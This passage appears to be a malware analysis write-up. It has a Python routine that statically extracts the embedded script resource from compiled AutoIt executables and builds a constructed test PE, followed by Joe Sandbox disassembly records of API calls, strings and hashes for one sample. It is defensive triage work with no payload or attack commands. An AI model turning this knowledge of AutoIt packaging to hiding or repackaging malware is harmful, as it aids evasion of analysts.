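AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."


def _rva_to_off(sections, rva):
    """Map an RVA to a file offset using the section table."""
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def _dir_entries(pe, base, dir_off):
    """Yield (name_or_id, offset) pairs of one IMAGE_RESOURCE_DIRECTORY at base+dir_off."""
    n_named, n_id = struct.unpack_from("<HH", pe, base + dir_off + 12)
    for i in range(n_named + n_id):
        yield struct.unpack_from("<II", pe, base + dir_off + 16 + i * 8)


def _entry_name(pe, base, field):
    """Decode an entry name: integer ID, or a UTF-16LE string when bit 31 is set."""
    if field & 0x80000000:
        off = base + (field & 0x7FFFFFFF)
        n = struct.unpack_from("<H", pe, off)[0]
        return pe[off + 2:off + 2 + 2 * n].decode("utf-16-le")
    return field


def extract_rcdata(pe, name="SCRIPT"):
    """Return the raw bytes of the RT_RCDATA resource called `name`, or None.

    Offline equivalent of FindResourceExW(h, RT_RCDATA, L"SCRIPT", lang) followed by
    LoadResource/SizeofResource/LockResource; name matching is case-insensitive as in Windows."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = opt + (96 if magic == 0x10B else 112)            # data directory: PE32 vs PE32+
    rsrc_rva, _rsrc_size = struct.unpack_from("<II", pe, dd + 2 * 8)  # entry 2 = resources
    if rsrc_rva == 0:
        return None
    sec_tab = opt + opt_size
    sections = [struct.unpack_from("<IIII", pe, sec_tab + i * 40 + 8) for i in range(n_sections)]
    base = _rva_to_off(sections, rsrc_rva)
    for type_field, type_off in _dir_entries(pe, base, 0):            # level 1: type
        if _entry_name(pe, base, type_field) != RT_RCDATA:
            continue
        for name_field, name_off in _dir_entries(pe, base, type_off & 0x7FFFFFFF):  # level 2: name
            entry_name = _entry_name(pe, base, name_field)
            if not isinstance(entry_name, str) or entry_name.upper() != name.upper():
                continue
            for _lang, data_off in _dir_entries(pe, base, name_off & 0x7FFFFFFF):  # level 3: language
                if data_off & 0x80000000:
                    continue                                          # unexpected deeper directory
                data_rva, size = struct.unpack_from("<II", pe, base + data_off)
                off = _rva_to_off(sections, data_rva)
                return pe[off:off + size]
    return None


def has_autoit_marker(pe):
    """True if the AutoIt runtime marker string is present as ASCII or UTF-16LE."""
    return AUTOIT_MARKER in pe or AUTOIT_MARKER.decode().encode("utf-16-le") in pe


def build_sample_pe(script_blob):
    """Constructed test input: a minimal PE32 with a single .rsrc section that holds
    RT_RCDATA / "SCRIPT" / 0x409 = script_blob plus the marker string. Not a real AutoIt binary."""
    name = "SCRIPT".encode("utf-16-le")
    str_off = 88                                  # root(0) -> type dir(24) -> name dir(48) -> data entry(72)
    data_off = (str_off + 2 + len(name) + 3) & ~3
    rsrc_rva, raw_ptr = 0x1000, 0x200
    rsrc = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)                  # root: one ID entry
    rsrc += struct.pack("<II", RT_RCDATA, 0x80000000 | 24)
    rsrc += struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0)                 # type dir: one named entry
    rsrc += struct.pack("<II", 0x80000000 | str_off, 0x80000000 | 48)
    rsrc += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)                 # name dir: one language entry
    rsrc += struct.pack("<II", 0x409, 72)
    rsrc += struct.pack("<IIII", rsrc_rva + data_off, len(script_blob), 0, 0)  # data entry (RVA, size)
    rsrc += struct.pack("<H", len(name) // 2) + name
    rsrc += b"\0" * (data_off - len(rsrc)) + script_blob
    hdr = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 94 + b"\0" * 16 + struct.pack("<II", rsrc_rva, len(rsrc))
    opt += b"\0" * (224 - len(opt))
    sec = b".rsrc\0\0\0" + struct.pack("<IIIIIIHHI", len(rsrc), rsrc_rva, len(rsrc), raw_ptr, 0, 0, 0, 0, 0x40000040)
    image = hdr + opt + sec + AUTOIT_MARKER
    return image + b"\0" * (raw_ptr - len(image)) + rsrc


if __name__ == "__main__":
    sample = build_sample_pe(b"\x00\x00\x00\x00constructed script payload")
    print("marker:", has_autoit_marker(sample), "SCRIPT resource:", extract_rcdata(sample))
```

On a real sample, pass `open(path, "rb").read()` to `extract_rcdata`; a non-empty result alongside `has_autoit_marker` is the static counterpart of the dynamic evidence above. The returned blob is the AutoIt container as stored, which still has to be decoded with an AutoIt-specific decompiler before the script logic can be read.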
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0039E398), ref: 003C446A
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 003C447B
                                                            • FindClose.KERNEL32(00000000), ref: 003C448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
                                                            • Instruction ID: 260b61b3aa551640694d1690b2e11948ab01f506d4f047667f99b47802ec9c9e
                                                            • Opcode Fuzzy Hash: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
                                                            • Instruction Fuzzy Hash: BAE0D8378145406B82256B38EC4DAE9775C9F05335F204B19F935C50D0E7B49D009695
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370A5B
                                                            • timeGetTime.WINMM ref: 00370D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370E53
                                                            • Sleep.KERNEL32(0000000A), ref: 00370E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00370EFA
                                                            • DestroyWindow.USER32 ref: 00370F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00370F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 003A4E83
                                                            • TranslateMessage.USER32(?), ref: 003A5C60
                                                            • DispatchMessageW.USER32(?), ref: 003A5C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003A5C82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbB$pbB$pbB$pbB
                                                            • API String ID: 4212290369-707248984
                                                            • Opcode ID: 78e6bace5540eb29bf37d8ac3a091953cc6ed8d798dd4f28dcc3f8515af6db84
                                                            • Instruction ID: 4652b29cb5ca71d7e33490bae53b8fbf11b6f7bd20c2cfa66235d067333820af
                                                            • Opcode Fuzzy Hash: 78e6bace5540eb29bf37d8ac3a091953cc6ed8d798dd4f28dcc3f8515af6db84
                                                            • Instruction Fuzzy Hash: 17B2C070608741DFD73ADF24C884BAAB7E4FF86304F15891DE4999B2A1CB75E844CB92

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 003C8F5F: __time64.LIBCMT ref: 003C8F69
                                                              • Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD
                                                            • __wsplitpath.LIBCMT ref: 003C9234
                                                              • Part of subcall function 003840FB: __wsplitpath_helper.LIBCMT ref: 0038413B
                                                            • _wcscpy.LIBCMT ref: 003C9247
                                                            • _wcscat.LIBCMT ref: 003C925A
                                                            • __wsplitpath.LIBCMT ref: 003C927F
                                                            • _wcscat.LIBCMT ref: 003C9295
                                                            • _wcscat.LIBCMT ref: 003C92A8
                                                              • Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FDE
                                                              • Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FED
                                                            • _wcscmp.LIBCMT ref: 003C91EF
                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C9452
                                                            • _wcsncpy.LIBCMT ref: 003C94C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 003C94FB
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003C9511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9522
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: e43db975d668dcffa6b4878b92ddc1e37616656ee94b07eaddd2bf9019cd91df
                                                            • Instruction ID: 9b156f3ba1a701b30a30a6a832e40f11cf0e5b6184617a5f3fb643c380d86c45
                                                            • Opcode Fuzzy Hash: e43db975d668dcffa6b4878b92ddc1e37616656ee94b07eaddd2bf9019cd91df
                                                            • Instruction Fuzzy Hash: 32C12AB1D00219AADF22DF95CC85FDEBBBDAF45310F0044AAF609EA151DB309E448F65

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                            • RegisterClassExW.USER32(00000030), ref: 0036309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                            • LoadIconW.USER32(000000A9), ref: 003630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
                                                            • Instruction ID: 143c8d3253955d3489b7f89cb32abd473717c9681cbb89b4750b18f213aa4bf6
                                                            • Opcode Fuzzy Hash: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
                                                            • Instruction Fuzzy Hash: ED3149B1940349EFDB619FA4D885AD9BBF4FB09310F10426AE580EA2A0D3F50596CF64

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                            • RegisterClassExW.USER32(00000030), ref: 0036309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                            • LoadIconW.USER32(000000A9), ref: 003630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
                                                            • Instruction ID: a83a36bf51d28092fd6566a0540cdcc40262a56a6003091d2b2b91a10404afca
                                                            • Opcode Fuzzy Hash: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
                                                            • Instruction Fuzzy Hash: AB21FCB1A01258EFDB21DF94EC88BDD7BF8FB08710F00422AF510AA2A0D7F145558F95

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00364706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004252F8,?,003637AE,?), ref: 00364724
                                                              • Part of subcall function 0038050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00367165), ref: 0038052D
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003671A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0039E8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0039E909
                                                            • RegCloseKey.ADVAPI32(?), ref: 0039E947
                                                            • _wcscat.LIBCMT ref: 0039E9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: b9b80a86667bd67eef26151a3dd2bc874ddd9b78c51aaabaa27d13ee8a65ed2f
                                                            • Instruction ID: 465104c37e8d7e4eedc0f4df5c775388c764b367aeb8a2f414afa7b227ff04b5
                                                            • Opcode Fuzzy Hash: b9b80a86667bd67eef26151a3dd2bc874ddd9b78c51aaabaa27d13ee8a65ed2f
                                                            • Instruction Fuzzy Hash: 04719E71608301DEC716EF25E8819ABBBE8FF84310F81497EF4458B1A0EB709949CB66

                                                            Control-flow Graph (rendered graph not preserved in this extraction): window procedure at 0x363633; its basic blocks call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus (see APIs below).
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 003636D2
                                                            • KillTimer.USER32(?,00000001), ref: 003636FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0036371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0036372A
                                                            • CreatePopupMenu.USER32 ref: 0036373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0036374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%?
                                                            • API String ID: 129472671-4267315211
                                                            • Opcode ID: a27a08edca916a729e55c807f5300295b00f8eb8db56bb7422ae12008c836365
                                                            • Instruction ID: 849c0b9f61bea13db480f04c8b2583559200590866e0c977d6d6ba67b42f44ed
                                                            • Opcode Fuzzy Hash: a27a08edca916a729e55c807f5300295b00f8eb8db56bb7422ae12008c836365
                                                            • Instruction Fuzzy Hash: 3A4146B2300545BBDF336F28EC8AB793B58EB01300F948135F5029A2E9CAB49E519779

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00363A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
                                                            • LoadIconW.USER32(00000063), ref: 00363A76
                                                            • LoadIconW.USER32(000000A4), ref: 00363A88
                                                            • LoadIconW.USER32(000000A2), ref: 00363A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
                                                            • RegisterClassExW.USER32(?), ref: 00363B16
                                                              • Part of subcall function 00363041: GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                              • Part of subcall function 00363041: RegisterClassExW.USER32(00000030), ref: 0036309E
                                                              • Part of subcall function 00363041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                              • Part of subcall function 00363041: InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                              • Part of subcall function 00363041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                              • Part of subcall function 00363041: LoadIconW.USER32(000000A9), ref: 003630F2
                                                              • Part of subcall function 00363041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
                                                            • Instruction ID: fc92b9fb9fcbad9a3aa38efdc8146e895de4a2c62bbea1524ffcbc1025864964
                                                            • Opcode Fuzzy Hash: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
                                                            • Instruction Fuzzy Hash: CC215E74E00304EFEB21DFA4EC49BAD7BB4FB08711F4041AAF500AA2E1D3B556518FA8

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RB
                                                            • API String ID: 1825951767-219029296
                                                            • Opcode ID: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
                                                            • Instruction ID: 0ed538ab04a73d891072ce89ba2e00ca2a7276d2f0c7ef3855ae583cb57c9ad9
                                                            • Opcode Fuzzy Hash: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
                                                            • Instruction Fuzzy Hash: F5A16E7290022D9ACF16EBA0DC95AFEB778BF15310F40852AF415BB195DF745A08CB60

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1
                                                              • Part of subcall function 003760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0036F930), ref: 00376154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0036F9CD
                                                            • OleInitialize.OLE32(00000000), ref: 0036FA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 003A45C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <WB$\TB$%?$SB
                                                            • API String ID: 1986988660-697478888
                                                            • Opcode ID: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
                                                            • Instruction ID: 4c7b18dc296dc458e6f460f84dc2938dd7c0807612e78b3ab77756d5284a18e7
                                                            • Opcode Fuzzy Hash: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
                                                            • Instruction Fuzzy Hash: 5D81ADB0B01A40DFC3A5EF29B945729BBE5FB983167D0813AD418CB261EBB44586CF19

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01671481
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016716A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                            • Instruction ID: 9bbebe0c569f632256550a40ecf5453dbd9988344916fe0b674ba0262acb8819
                                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                            • Instruction Fuzzy Hash: 59A10774E00219EBEB14CFA4C994BEEBBB5FF49304F24815AE501BB280D7759A81CF94

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00363A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00363A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
